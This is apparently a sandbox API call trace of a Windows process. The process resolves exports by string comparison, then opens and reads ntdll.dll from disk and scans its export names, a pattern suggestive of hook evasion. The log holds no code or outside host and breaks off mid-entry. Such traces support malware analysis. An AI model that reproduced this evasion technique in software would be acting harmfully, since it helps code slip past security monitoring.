[0290.064] lstrcmpA (lpString1="CLSIDFromProgIDEx", lpString2="CLIPFORMAT_UserFreeExt") returned 1 [0290.064] lstrcmpA (lpString1="CLSIDFromProgIDEx", lpString2="CLIPFORMAT_UserMarshal") returned 1 [0290.064] lstrcmpA (lpString1="CLSIDFromProgIDEx", lpString2="CLIPFORMAT_UserMarshal64") returned 1 [0290.064] lstrcmpA (lpString1="CLSIDFromProgIDEx", lpString2="CLIPFORMAT_UserMarshalExt") returned 1 [0290.064] lstrcmpA (lpString1="CLSIDFromProgIDEx", lpString2="CLIPFORMAT_UserSize") returned 1 [0290.064] lstrcmpA (lpString1="CLSIDFromProgIDEx", lpString2="CLIPFORMAT_UserSize64") returned 1 [0290.064] lstrcmpA (lpString1="CLSIDFromProgIDEx", lpString2="CLIPFORMAT_UserSizeExt") returned 1 [0290.064] lstrcmpA (lpString1="CLSIDFromProgIDEx", lpString2="CLIPFORMAT_UserUnmarshal") returned 1 [0290.064] lstrcmpA (lpString1="CLSIDFromProgIDEx", lpString2="CLIPFORMAT_UserUnmarshal64") returned 1 [0290.064] lstrcmpA (lpString1="CLSIDFromProgIDEx", lpString2="CLIPFORMAT_UserUnmarshalExt") returned 1 [0290.064] lstrcmpA (lpString1="CLSIDFromProgIDEx", lpString2="CLSIDFromOle1Class") returned 1 [0290.064] lstrcmpA (lpString1="CLSIDFromProgIDEx", lpString2="CLSIDFromProgID") returned 1 [0290.064] lstrcmpA (lpString1="CLSIDFromProgIDEx", lpString2="CLSIDFromProgIDEx") returned 0 [0290.064] lstrcmpA (lpString1="CheckInitDde", lpString2="BindMoniker") returned 1 [0290.064] lstrcmpA (lpString1="CheckInitDde", lpString2="CLIPFORMAT_UserFree") returned -1 [0290.064] lstrcmpA (lpString1="CheckInitDde", lpString2="CLIPFORMAT_UserFree64") returned -1 [0290.065] lstrcmpA (lpString1="CheckInitDde", lpString2="CLIPFORMAT_UserFreeExt") returned -1 [0290.065] lstrcmpA (lpString1="CheckInitDde", lpString2="CLIPFORMAT_UserMarshal") returned -1 [0290.065] lstrcmpA (lpString1="CheckInitDde", lpString2="CLIPFORMAT_UserMarshal64") returned -1 [0290.065] lstrcmpA (lpString1="CheckInitDde", lpString2="CLIPFORMAT_UserMarshalExt") returned -1 [0290.065] lstrcmpA (lpString1="CheckInitDde", lpString2="CLIPFORMAT_UserSize") returned -1 [0290.065] lstrcmpA (lpString1="CheckInitDde", lpString2="CLIPFORMAT_UserSize64") returned -1 [0290.065] lstrcmpA (lpString1="CheckInitDde", lpString2="CLIPFORMAT_UserSizeExt") returned -1 [0290.065] lstrcmpA (lpString1="CheckInitDde", lpString2="CLIPFORMAT_UserUnmarshal") returned -1 [0290.065] lstrcmpA (lpString1="CheckInitDde", lpString2="CLIPFORMAT_UserUnmarshal64") returned -1 [0290.065] lstrcmpA (lpString1="CheckInitDde", lpString2="CLIPFORMAT_UserUnmarshalExt") returned -1 [0290.065] lstrcmpA (lpString1="CheckInitDde", lpString2="CLSIDFromOle1Class") returned -1 [0290.065] lstrcmpA (lpString1="CheckInitDde", lpString2="CLSIDFromProgID") returned -1 [0290.065] lstrcmpA (lpString1="CheckInitDde", lpString2="CLSIDFromProgIDEx") returned -1 [0290.065] lstrcmpA (lpString1="CheckInitDde", lpString2="CLSIDFromString") returned -1 [0290.065] lstrcmpA (lpString1="CheckInitDde", lpString2="CStdAsyncStubBuffer2_Connect") returned -1 [0290.065] lstrcmpA (lpString1="CheckInitDde", lpString2="CStdAsyncStubBuffer2_Disconnect") returned -1 [0290.065] lstrcmpA (lpString1="CheckInitDde", lpString2="CStdAsyncStubBuffer2_Release") returned -1 [0290.065] lstrcmpA (lpString1="CheckInitDde", lpString2="CStdAsyncStubBuffer_AddRef") returned -1 [0290.065] lstrcmpA (lpString1="CheckInitDde", lpString2="CStdAsyncStubBuffer_Connect") returned -1 [0290.066] lstrcmpA (lpString1="CheckInitDde", lpString2="CStdAsyncStubBuffer_Disconnect") returned -1 [0290.066] lstrcmpA (lpString1="CheckInitDde", lpString2="CStdAsyncStubBuffer_Invoke") returned -1 [0290.066] lstrcmpA (lpString1="CheckInitDde", lpString2="CStdAsyncStubBuffer_QueryInterface") returned -1 [0290.066] lstrcmpA (lpString1="CheckInitDde", lpString2="CStdAsyncStubBuffer_Release") returned -1 [0290.066] lstrcmpA (lpString1="CheckInitDde", lpString2="CStdStubBuffer2_Connect") returned -1 [0290.066] lstrcmpA (lpString1="CheckInitDde", lpString2="CStdStubBuffer2_CountRefs") returned -1 [0290.066] lstrcmpA (lpString1="CheckInitDde", lpString2="CStdStubBuffer2_Disconnect") returned -1 [0290.066] lstrcmpA (lpString1="CheckInitDde", lpString2="CStdStubBuffer2_QueryInterface") returned -1 [0290.066] lstrcmpA (lpString1="CheckInitDde", lpString2="CheckInitDde") returned 0 [0290.066] lstrcmpA (lpString1="CleanROTForApartment", lpString2="BindMoniker") returned 1 [0290.066] lstrcmpA (lpString1="CleanROTForApartment", lpString2="CLIPFORMAT_UserFree") returned -1 [0290.066] lstrcmpA (lpString1="CleanROTForApartment", lpString2="CLIPFORMAT_UserFree64") returned -1 [0290.066] lstrcmpA (lpString1="CleanROTForApartment", lpString2="CLIPFORMAT_UserFreeExt") returned -1 [0290.066] lstrcmpA (lpString1="CleanROTForApartment", lpString2="CLIPFORMAT_UserMarshal") returned -1 [0290.066] lstrcmpA (lpString1="CleanROTForApartment", lpString2="CLIPFORMAT_UserMarshal64") returned -1 [0290.066] lstrcmpA (lpString1="CleanROTForApartment", lpString2="CLIPFORMAT_UserMarshalExt") returned -1 [0290.066] lstrcmpA (lpString1="CleanROTForApartment", lpString2="CLIPFORMAT_UserSize") returned -1 [0290.067] lstrcmpA (lpString1="CleanROTForApartment", lpString2="CLIPFORMAT_UserSize64") returned -1 [0290.067] lstrcmpA (lpString1="CleanROTForApartment", lpString2="CLIPFORMAT_UserSizeExt") returned -1 [0290.067] lstrcmpA (lpString1="CleanROTForApartment", lpString2="CLIPFORMAT_UserUnmarshal") returned -1 [0290.067] lstrcmpA (lpString1="CleanROTForApartment", lpString2="CLIPFORMAT_UserUnmarshal64") returned -1 [0290.067] lstrcmpA (lpString1="CleanROTForApartment", lpString2="CLIPFORMAT_UserUnmarshalExt") returned -1 [0290.067] lstrcmpA (lpString1="CleanROTForApartment", lpString2="CLSIDFromOle1Class") returned -1 [0290.067] lstrcmpA (lpString1="CleanROTForApartment", lpString2="CLSIDFromProgID") returned -1 [0290.067] lstrcmpA (lpString1="CleanROTForApartment", lpString2="CLSIDFromProgIDEx") returned -1 [0290.067] lstrcmpA (lpString1="CleanROTForApartment", lpString2="CLSIDFromString") returned -1 [0290.067] lstrcmpA (lpString1="CleanROTForApartment", lpString2="CStdAsyncStubBuffer2_Connect") returned -1 [0290.067] lstrcmpA (lpString1="CleanROTForApartment", lpString2="CStdAsyncStubBuffer2_Disconnect") returned -1 [0290.067] lstrcmpA (lpString1="CleanROTForApartment", lpString2="CStdAsyncStubBuffer2_Release") returned -1 [0290.067] lstrcmpA (lpString1="CleanROTForApartment", lpString2="CStdAsyncStubBuffer_AddRef") returned -1 [0290.067] lstrcmpA (lpString1="CleanROTForApartment", lpString2="CStdAsyncStubBuffer_Connect") returned -1 [0290.067] lstrcmpA (lpString1="CleanROTForApartment", lpString2="CStdAsyncStubBuffer_Disconnect") returned -1 [0290.067] lstrcmpA (lpString1="CleanROTForApartment", lpString2="CStdAsyncStubBuffer_Invoke") returned -1 [0290.067] lstrcmpA (lpString1="CleanROTForApartment", lpString2="CStdAsyncStubBuffer_QueryInterface") returned -1 [0290.067] lstrcmpA (lpString1="CleanROTForApartment", lpString2="CStdAsyncStubBuffer_Release") returned -1 [0290.067] lstrcmpA (lpString1="CleanROTForApartment", lpString2="CStdStubBuffer2_Connect") returned -1 [0290.067] lstrcmpA (lpString1="CleanROTForApartment", lpString2="CStdStubBuffer2_CountRefs") returned -1 [0290.067] lstrcmpA (lpString1="CleanROTForApartment", lpString2="CStdStubBuffer2_Disconnect") returned -1 [0290.067] lstrcmpA (lpString1="CleanROTForApartment", lpString2="CStdStubBuffer2_QueryInterface") returned -1 [0290.068] lstrcmpA (lpString1="CleanROTForApartment", lpString2="CheckInitDde") returned 1 [0290.068] lstrcmpA (lpString1="CleanROTForApartment", lpString2="CleanROTForApartment") returned 0 [0290.068] lstrcmpA (lpString1="ClipboardProcessUninitialize", lpString2="BindMoniker") returned 1 [0290.068] lstrcmpA (lpString1="ClipboardProcessUninitialize", lpString2="CLIPFORMAT_UserFree") returned -1 [0290.068] lstrcmpA (lpString1="ClipboardProcessUninitialize", lpString2="CLIPFORMAT_UserFree64") returned -1 [0290.068] lstrcmpA (lpString1="ClipboardProcessUninitialize", lpString2="CLIPFORMAT_UserFreeExt") returned -1 [0290.068] lstrcmpA (lpString1="ClipboardProcessUninitialize", lpString2="CLIPFORMAT_UserMarshal") returned -1 [0290.068] lstrcmpA (lpString1="ClipboardProcessUninitialize", lpString2="CLIPFORMAT_UserMarshal64") returned -1 [0290.068] lstrcmpA (lpString1="ClipboardProcessUninitialize", lpString2="CLIPFORMAT_UserMarshalExt") returned -1 [0290.068] lstrcmpA (lpString1="ClipboardProcessUninitialize", lpString2="CLIPFORMAT_UserSize") returned -1 [0290.068] lstrcmpA (lpString1="ClipboardProcessUninitialize", lpString2="CLIPFORMAT_UserSize64") returned -1 [0290.068] lstrcmpA (lpString1="ClipboardProcessUninitialize", lpString2="CLIPFORMAT_UserSizeExt") returned -1 [0290.069] lstrcmpA (lpString1="ClipboardProcessUninitialize", lpString2="CLIPFORMAT_UserUnmarshal") returned -1 [0290.069] lstrcmpA (lpString1="ClipboardProcessUninitialize", lpString2="CLIPFORMAT_UserUnmarshal64") returned -1 [0290.069] lstrcmpA (lpString1="ClipboardProcessUninitialize", lpString2="CLIPFORMAT_UserUnmarshalExt") returned -1 [0290.069] lstrcmpA (lpString1="ClipboardProcessUninitialize", lpString2="CLSIDFromOle1Class") returned -1 [0290.069] lstrcmpA (lpString1="ClipboardProcessUninitialize", lpString2="CLSIDFromProgID") returned -1 [0290.069] lstrcmpA (lpString1="ClipboardProcessUninitialize", lpString2="CLSIDFromProgIDEx") returned -1 [0290.069] lstrcmpA (lpString1="ClipboardProcessUninitialize", lpString2="CLSIDFromString") returned -1 [0290.069] lstrcmpA (lpString1="ClipboardProcessUninitialize", lpString2="CStdAsyncStubBuffer2_Connect") returned -1 [0290.069] lstrcmpA (lpString1="ClipboardProcessUninitialize", lpString2="CStdAsyncStubBuffer2_Disconnect") returned -1 [0290.069] lstrcmpA (lpString1="ClipboardProcessUninitialize", lpString2="CStdAsyncStubBuffer2_Release") returned -1 [0290.069] lstrcmpA (lpString1="ClipboardProcessUninitialize", lpString2="CStdAsyncStubBuffer_AddRef") returned -1 [0290.069] lstrcmpA (lpString1="ClipboardProcessUninitialize", lpString2="CStdAsyncStubBuffer_Connect") returned -1 [0290.069] lstrcmpA (lpString1="ClipboardProcessUninitialize", lpString2="CStdAsyncStubBuffer_Disconnect") returned -1 [0290.069] lstrcmpA (lpString1="ClipboardProcessUninitialize", lpString2="CStdAsyncStubBuffer_Invoke") returned -1 [0290.069] lstrcmpA (lpString1="ClipboardProcessUninitialize", lpString2="CStdAsyncStubBuffer_QueryInterface") returned -1 [0290.069] lstrcmpA (lpString1="ClipboardProcessUninitialize", lpString2="CStdAsyncStubBuffer_Release") returned -1 [0290.069] lstrcmpA (lpString1="ClipboardProcessUninitialize", lpString2="CStdStubBuffer2_Connect") returned -1 [0290.070] lstrcmpA (lpString1="ClipboardProcessUninitialize", lpString2="CStdStubBuffer2_CountRefs") returned -1 [0290.070] lstrcmpA (lpString1="ClipboardProcessUninitialize", lpString2="CStdStubBuffer2_Disconnect") returned -1 [0290.070] lstrcmpA (lpString1="ClipboardProcessUninitialize", lpString2="CStdStubBuffer2_QueryInterface") returned -1 [0290.070] lstrcmpA (lpString1="ClipboardProcessUninitialize", lpString2="CheckInitDde") returned 1 [0290.070] lstrcmpA (lpString1="ClipboardProcessUninitialize", lpString2="CleanROTForApartment") returned 1 [0290.070] lstrcmpA (lpString1="ClipboardProcessUninitialize", lpString2="ClipboardProcessUninitialize") returned 0 [0290.070] lstrcmpA (lpString1="CoAicGetTokenForCOM", lpString2="BindMoniker") returned 1 [0290.070] lstrcmpA (lpString1="CoAicGetTokenForCOM", lpString2="CLIPFORMAT_UserFree") returned 1 [0290.070] lstrcmpA (lpString1="CoAicGetTokenForCOM", lpString2="CLIPFORMAT_UserFree64") returned 1 [0290.070] lstrcmpA (lpString1="CoAicGetTokenForCOM", lpString2="CLIPFORMAT_UserFreeExt") returned 1 [0290.070] lstrcmpA (lpString1="CoAicGetTokenForCOM", lpString2="CLIPFORMAT_UserMarshal") returned 1 [0290.070] lstrcmpA (lpString1="CoAicGetTokenForCOM", lpString2="CLIPFORMAT_UserMarshal64") returned 1 [0290.070] lstrcmpA (lpString1="CoAicGetTokenForCOM", lpString2="CLIPFORMAT_UserMarshalExt") returned 1 [0290.070] lstrcmpA (lpString1="CoAicGetTokenForCOM", lpString2="CLIPFORMAT_UserSize") returned 1 [0290.070] lstrcmpA (lpString1="CoAicGetTokenForCOM", lpString2="CLIPFORMAT_UserSize64") returned 1 [0290.071] lstrcmpA (lpString1="CoAicGetTokenForCOM", lpString2="CLIPFORMAT_UserSizeExt") returned 1 [0290.071] lstrcmpA (lpString1="CoAicGetTokenForCOM", lpString2="CLIPFORMAT_UserUnmarshal") returned 1 [0290.071] lstrcmpA (lpString1="CoAicGetTokenForCOM", lpString2="CLIPFORMAT_UserUnmarshal64") returned 1 [0290.071] lstrcmpA (lpString1="CoAicGetTokenForCOM", lpString2="CLIPFORMAT_UserUnmarshalExt") returned 1 [0290.071] lstrcmpA (lpString1="CoAicGetTokenForCOM", lpString2="CLSIDFromOle1Class") returned 1 [0290.071] lstrcmpA (lpString1="CoAicGetTokenForCOM", lpString2="CLSIDFromProgID") returned 1 [0290.071] lstrcmpA (lpString1="CoAicGetTokenForCOM", lpString2="CLSIDFromProgIDEx") returned 1 [0290.071] lstrcmpA (lpString1="CoAicGetTokenForCOM", lpString2="CLSIDFromString") returned 1 [0290.071] lstrcmpA (lpString1="CoAicGetTokenForCOM", lpString2="CStdAsyncStubBuffer2_Connect") returned -1 [0290.071] lstrcmpA (lpString1="CoAicGetTokenForCOM", lpString2="CStdAsyncStubBuffer2_Disconnect") returned -1 [0290.071] lstrcmpA (lpString1="CoAicGetTokenForCOM", lpString2="CStdAsyncStubBuffer2_Release") returned -1 [0290.071] lstrcmpA (lpString1="CoAicGetTokenForCOM", lpString2="CStdAsyncStubBuffer_AddRef") returned -1 [0290.071] lstrcmpA (lpString1="CoAicGetTokenForCOM", lpString2="CStdAsyncStubBuffer_Connect") returned -1 [0290.071] lstrcmpA (lpString1="CoAicGetTokenForCOM", lpString2="CStdAsyncStubBuffer_Disconnect") returned -1 [0290.071] lstrcmpA (lpString1="CoAicGetTokenForCOM", lpString2="CStdAsyncStubBuffer_Invoke") returned -1 [0290.071] lstrcmpA (lpString1="CoAicGetTokenForCOM", lpString2="CStdAsyncStubBuffer_QueryInterface") returned -1 [0290.071] lstrcmpA (lpString1="CoAicGetTokenForCOM", lpString2="CStdAsyncStubBuffer_Release") returned -1 [0290.071] lstrcmpA (lpString1="CoAicGetTokenForCOM", lpString2="CStdStubBuffer2_Connect") returned -1 [0290.072] lstrcmpA (lpString1="CoAicGetTokenForCOM", lpString2="CStdStubBuffer2_CountRefs") returned -1 [0290.072] lstrcmpA (lpString1="CoAicGetTokenForCOM", lpString2="CStdStubBuffer2_Disconnect") returned -1 [0290.072] lstrcmpA (lpString1="CoAicGetTokenForCOM", lpString2="CStdStubBuffer2_QueryInterface") returned -1 [0290.072] lstrcmpA (lpString1="CoAicGetTokenForCOM", lpString2="CheckInitDde") returned 1 [0290.072] lstrcmpA (lpString1="CoAicGetTokenForCOM", lpString2="CleanROTForApartment") returned 1 [0290.072] lstrcmpA (lpString1="CoAicGetTokenForCOM", lpString2="ClipboardProcessUninitialize") returned 1 [0290.072] lstrcmpA (lpString1="CoAicGetTokenForCOM", lpString2="CoAddRefServerProcess") returned 1 [0290.072] lstrcmpA (lpString1="CoAicGetTokenForCOM", lpString2="CoAicGetTokenForCOM") returned 0 [0290.072] lstrcmpA (lpString1="CoAllowSetForegroundWindow", lpString2="BindMoniker") returned 1 [0290.072] lstrcmpA (lpString1="CoAllowSetForegroundWindow", lpString2="CLIPFORMAT_UserFree") returned 1 [0290.072] lstrcmpA (lpString1="CoAllowSetForegroundWindow", lpString2="CLIPFORMAT_UserFree64") returned 1 [0290.072] lstrcmpA (lpString1="CoAllowSetForegroundWindow", lpString2="CLIPFORMAT_UserFreeExt") returned 1 [0290.072] lstrcmpA (lpString1="CoAllowSetForegroundWindow", lpString2="CLIPFORMAT_UserMarshal") returned 1 [0290.072] lstrcmpA (lpString1="CoAllowSetForegroundWindow", lpString2="CLIPFORMAT_UserMarshal64") returned 1 [0290.072] lstrcmpA (lpString1="CoAllowSetForegroundWindow", lpString2="CLIPFORMAT_UserMarshalExt") returned 1 [0290.072] lstrcmpA (lpString1="CoAllowSetForegroundWindow", lpString2="CLIPFORMAT_UserSize") returned 1 [0290.072] lstrcmpA (lpString1="CoAllowSetForegroundWindow", lpString2="CLIPFORMAT_UserSize64") returned 1 [0290.072] lstrcmpA (lpString1="CoAllowSetForegroundWindow", lpString2="CLIPFORMAT_UserSizeExt") returned 1 [0290.072] lstrcmpA (lpString1="CoAllowSetForegroundWindow", lpString2="CLIPFORMAT_UserUnmarshal") returned 1 [0290.073] lstrcmpA (lpString1="CoAllowSetForegroundWindow", lpString2="CLIPFORMAT_UserUnmarshal64") returned 1 [0290.073] lstrcmpA (lpString1="CoAllowSetForegroundWindow", lpString2="CLIPFORMAT_UserUnmarshalExt") returned 1 [0290.073] lstrcmpA (lpString1="CoAllowSetForegroundWindow", lpString2="CLSIDFromOle1Class") returned 1 [0290.073] lstrcmpA (lpString1="CoAllowSetForegroundWindow", lpString2="CLSIDFromProgID") returned 1 [0290.073] lstrcmpA (lpString1="CoAllowSetForegroundWindow", lpString2="CLSIDFromProgIDEx") returned 1 [0290.073] lstrcmpA (lpString1="CoAllowSetForegroundWindow", lpString2="CLSIDFromString") returned 1 [0290.073] lstrcmpA (lpString1="CoAllowSetForegroundWindow", lpString2="CStdAsyncStubBuffer2_Connect") returned -1 [0290.073] lstrcmpA (lpString1="CoAllowSetForegroundWindow", lpString2="CStdAsyncStubBuffer2_Disconnect") returned -1 [0290.073] lstrcmpA (lpString1="CoAllowSetForegroundWindow", lpString2="CStdAsyncStubBuffer2_Release") returned -1 [0290.073] lstrcmpA (lpString1="CoAllowSetForegroundWindow", lpString2="CStdAsyncStubBuffer_AddRef") returned -1 [0290.073] lstrcmpA (lpString1="CoAllowSetForegroundWindow", lpString2="CStdAsyncStubBuffer_Connect") returned -1 [0290.073] lstrcmpA (lpString1="CoAllowSetForegroundWindow", lpString2="CStdAsyncStubBuffer_Disconnect") returned -1 [0290.073] lstrcmpA (lpString1="CoAllowSetForegroundWindow", lpString2="CStdAsyncStubBuffer_Invoke") returned -1 [0290.073] lstrcmpA (lpString1="CoAllowSetForegroundWindow", lpString2="CStdAsyncStubBuffer_QueryInterface") returned -1 [0290.073] lstrcmpA (lpString1="CoAllowSetForegroundWindow", lpString2="CStdAsyncStubBuffer_Release") returned -1 [0290.073] lstrcmpA (lpString1="CoAllowSetForegroundWindow", lpString2="CStdStubBuffer2_Connect") returned -1 [0290.073] lstrcmpA (lpString1="CoAllowSetForegroundWindow", lpString2="CStdStubBuffer2_CountRefs") returned -1 [0290.073] lstrcmpA (lpString1="CoAllowSetForegroundWindow", lpString2="CStdStubBuffer2_Disconnect") returned -1 [0290.073] lstrcmpA (lpString1="CoAllowSetForegroundWindow", lpString2="CStdStubBuffer2_QueryInterface") returned -1 [0290.073] lstrcmpA (lpString1="CoAllowSetForegroundWindow", lpString2="CheckInitDde") returned 1 [0290.074] lstrcmpA (lpString1="CoAllowSetForegroundWindow", lpString2="CleanROTForApartment") returned 1 [0290.074] lstrcmpA (lpString1="CoAllowSetForegroundWindow", lpString2="ClipboardProcessUninitialize") returned 1 [0290.074] lstrcmpA (lpString1="CoAllowSetForegroundWindow", lpString2="CoAddRefServerProcess") returned 1 [0290.074] lstrcmpA (lpString1="CoAllowSetForegroundWindow", lpString2="CoAicGetTokenForCOM") returned 1 [0290.074] lstrcmpA (lpString1="CoAllowSetForegroundWindow", lpString2="CoAllowSetForegroundWindow") returned 0 [0290.074] lstrcmpA (lpString1="CoBuildVersion", lpString2="BindMoniker") returned 1 [0290.074] lstrcmpA (lpString1="CoBuildVersion", lpString2="CLIPFORMAT_UserFree") returned 1 [0290.074] lstrcmpA (lpString1="CoBuildVersion", lpString2="CLIPFORMAT_UserFree64") returned 1 [0290.074] lstrcmpA (lpString1="CoBuildVersion", lpString2="CLIPFORMAT_UserFreeExt") returned 1 [0290.074] lstrcmpA (lpString1="CoBuildVersion", lpString2="CLIPFORMAT_UserMarshal") returned 1 [0290.074] lstrcmpA (lpString1="CoBuildVersion", lpString2="CLIPFORMAT_UserMarshal64") returned 1 [0290.074] lstrcmpA (lpString1="CoBuildVersion", lpString2="CLIPFORMAT_UserMarshalExt") returned 1 [0290.074] lstrcmpA (lpString1="CoBuildVersion", lpString2="CLIPFORMAT_UserSize") returned 1 [0290.074] lstrcmpA (lpString1="CoBuildVersion", lpString2="CLIPFORMAT_UserSize64") returned 1 [0290.074] lstrcmpA (lpString1="CoBuildVersion", lpString2="CLIPFORMAT_UserSizeExt") returned 1 [0290.074] lstrcmpA (lpString1="CoBuildVersion", lpString2="CLIPFORMAT_UserUnmarshal") returned 1 [0290.074] lstrcmpA (lpString1="CoBuildVersion", lpString2="CLIPFORMAT_UserUnmarshal64") returned 1 [0290.074] lstrcmpA (lpString1="CoBuildVersion", lpString2="CLIPFORMAT_UserUnmarshalExt") returned 1 [0290.074] lstrcmpA (lpString1="CoBuildVersion", lpString2="CLSIDFromOle1Class") returned 1 [0290.074] lstrcmpA (lpString1="CoBuildVersion", lpString2="CLSIDFromProgID") returned 1 [0290.074] lstrcmpA (lpString1="CoBuildVersion", lpString2="CLSIDFromProgIDEx") returned 1 [0290.074] lstrcmpA (lpString1="CoBuildVersion", lpString2="CLSIDFromString") returned 1 [0290.074] lstrcmpA (lpString1="CoBuildVersion", lpString2="CStdAsyncStubBuffer2_Connect") returned -1 [0290.075] lstrcmpA (lpString1="CoBuildVersion", lpString2="CStdAsyncStubBuffer2_Disconnect") returned -1 [0290.075] lstrcmpA (lpString1="CoBuildVersion", lpString2="CStdAsyncStubBuffer2_Release") returned -1 [0290.075] lstrcmpA (lpString1="CoBuildVersion", lpString2="CStdAsyncStubBuffer_AddRef") returned -1 [0290.075] lstrcmpA (lpString1="CoBuildVersion", lpString2="CStdAsyncStubBuffer_Connect") returned -1 [0290.075] lstrcmpA (lpString1="CoBuildVersion", lpString2="CStdAsyncStubBuffer_Disconnect") returned -1 [0290.075] lstrcmpA (lpString1="CoBuildVersion", lpString2="CStdAsyncStubBuffer_Invoke") returned -1 [0290.075] lstrcmpA (lpString1="CoBuildVersion", lpString2="CStdAsyncStubBuffer_QueryInterface") returned -1 [0290.075] lstrcmpA (lpString1="CoBuildVersion", lpString2="CStdAsyncStubBuffer_Release") returned -1 [0290.075] lstrcmpA (lpString1="CoBuildVersion", lpString2="CStdStubBuffer2_Connect") returned -1 [0290.075] lstrcmpA (lpString1="CoBuildVersion", lpString2="CStdStubBuffer2_CountRefs") returned -1 [0290.075] lstrcmpA (lpString1="CoBuildVersion", lpString2="CStdStubBuffer2_Disconnect") returned -1 [0290.075] lstrcmpA (lpString1="CoBuildVersion", lpString2="CStdStubBuffer2_QueryInterface") returned -1 [0290.075] lstrcmpA (lpString1="CoBuildVersion", lpString2="CheckInitDde") returned 1 [0290.242] GetProcessHeap () returned 0x5d0000 [0290.243] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x400e040 | out: hHeap=0x5d0000) returned 1 [0290.250] GetProcessHeap () returned 0x5d0000 [0290.250] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x0, Size=0x10) returned 0x5e90e0 [0290.250] LoadLibraryA (lpLibFileName="Ntdll.dll") returned 0x7ffc5f810000 [0290.250] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="GetModuleFileNameA") returned 0x7ffc5ecf6e30 [0290.250] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="CreateFileA") returned 0x7ffc5ecfd8a0 [0290.250] GetModuleFileNameA (in: hModule=0x7ffc5f810000, lpFilename=0x14f5d0, nSize=0x104 | out: lpFilename="C:\\Windows\\SYSTEM32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll")) returned 0x1d [0290.251] CreateFileA (lpFileName="C:\\Windows\\SYSTEM32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x140 [0290.252] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="GetFileSizeEx") returned 0x7ffc5ecfdaa0 [0290.252] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="CloseHandle") returned 0x7ffc5ecfd650 [0290.252] GetFileSizeEx (in: hFile=0x140, lpFileSize=0x14f5b0 | out: lpFileSize=0x14f5b0*=1817160) returned 1 [0290.252] GetProcessHeap () returned 0x5d0000 [0290.252] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x0, Size=0x1bba48) returned 0x4009040 [0290.257] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="ReadFile") returned 0x7ffc5ecfdbd0 [0290.257] ReadFile (in: hFile=0x140, lpBuffer=0x4009040, nNumberOfBytesToRead=0x1bba48, lpNumberOfBytesRead=0x14f5a4, lpOverlapped=0x0 | out: lpBuffer=0x4009040*, lpNumberOfBytesRead=0x14f5a4*=0x1bba48, lpOverlapped=0x0) returned 1 [0290.389] CloseHandle (hObject=0x140) returned 1 [0290.389] lstrcmpA (lpString1="A_SHAFinal", lpString2="A_SHAFinal") returned 0 [0290.389] lstrcmpA (lpString1="A_SHAInit", lpString2="A_SHAFinal") returned 1 [0290.389] lstrcmpA (lpString1="A_SHAInit", lpString2="A_SHAInit") returned 0 [0290.389] lstrcmpA (lpString1="A_SHAUpdate", lpString2="A_SHAFinal") returned 1 [0290.389] lstrcmpA (lpString1="A_SHAUpdate", lpString2="A_SHAInit") returned 1 [0290.389] lstrcmpA (lpString1="A_SHAUpdate", lpString2="A_SHAUpdate") returned 0 [0290.390] lstrcmpA (lpString1="AlpcAdjustCompletionListConcurrencyCount", lpString2="A_SHAFinal") returned 1 [0290.390] lstrcmpA (lpString1="AlpcAdjustCompletionListConcurrencyCount", lpString2="A_SHAInit") returned 1 [0290.390] lstrcmpA (lpString1="AlpcAdjustCompletionListConcurrencyCount", lpString2="A_SHAUpdate") returned 1 [0290.390] lstrcmpA (lpString1="AlpcAdjustCompletionListConcurrencyCount", lpString2="AlpcAdjustCompletionListConcurrencyCount") returned 0 [0290.390] lstrcmpA (lpString1="AlpcFreeCompletionListMessage", lpString2="A_SHAFinal") returned 1 [0290.390] lstrcmpA (lpString1="AlpcFreeCompletionListMessage", lpString2="A_SHAInit") returned 1 [0290.390] lstrcmpA (lpString1="AlpcFreeCompletionListMessage", lpString2="A_SHAUpdate") returned 1 [0290.390] lstrcmpA (lpString1="AlpcFreeCompletionListMessage", lpString2="AlpcAdjustCompletionListConcurrencyCount") returned 1 [0290.390] lstrcmpA (lpString1="AlpcFreeCompletionListMessage", lpString2="AlpcFreeCompletionListMessage") returned 0 [0290.390] lstrcmpA (lpString1="AlpcGetCompletionListLastMessageInformation", lpString2="A_SHAFinal") returned 1 [0290.390] lstrcmpA (lpString1="AlpcGetCompletionListLastMessageInformation", lpString2="A_SHAInit") returned 1 [0290.390] lstrcmpA (lpString1="AlpcGetCompletionListLastMessageInformation", lpString2="A_SHAUpdate") returned 1 [0290.390] lstrcmpA (lpString1="AlpcGetCompletionListLastMessageInformation", lpString2="AlpcAdjustCompletionListConcurrencyCount") returned 1 [0290.390] lstrcmpA (lpString1="AlpcGetCompletionListLastMessageInformation", lpString2="AlpcFreeCompletionListMessage") returned 1 [0290.390] lstrcmpA (lpString1="AlpcGetCompletionListLastMessageInformation", lpString2="AlpcGetCompletionListLastMessageInformation") returned 0 [0290.391] lstrcmpA (lpString1="AlpcGetCompletionListMessageAttributes", lpString2="A_SHAFinal") returned 1 [0290.391] lstrcmpA (lpString1="AlpcGetCompletionListMessageAttributes", lpString2="A_SHAInit") returned 1 [0290.391] lstrcmpA (lpString1="AlpcGetCompletionListMessageAttributes", lpString2="A_SHAUpdate") returned 1 [0290.391] lstrcmpA (lpString1="AlpcGetCompletionListMessageAttributes", lpString2="AlpcAdjustCompletionListConcurrencyCount") returned 1 [0290.391] lstrcmpA (lpString1="AlpcGetCompletionListMessageAttributes", lpString2="AlpcFreeCompletionListMessage") returned 1 [0290.391] lstrcmpA (lpString1="AlpcGetCompletionListMessageAttributes", lpString2="AlpcGetCompletionListLastMessageInformation") returned 1 [0290.391] lstrcmpA (lpString1="AlpcGetCompletionListMessageAttributes", lpString2="AlpcGetCompletionListMessageAttributes") returned 0 [0290.391] lstrcmpA (lpString1="AlpcGetHeaderSize", lpString2="A_SHAFinal") returned 1 [0290.391] lstrcmpA (lpString1="AlpcGetHeaderSize", lpString2="A_SHAInit") returned 1 [0290.391] lstrcmpA 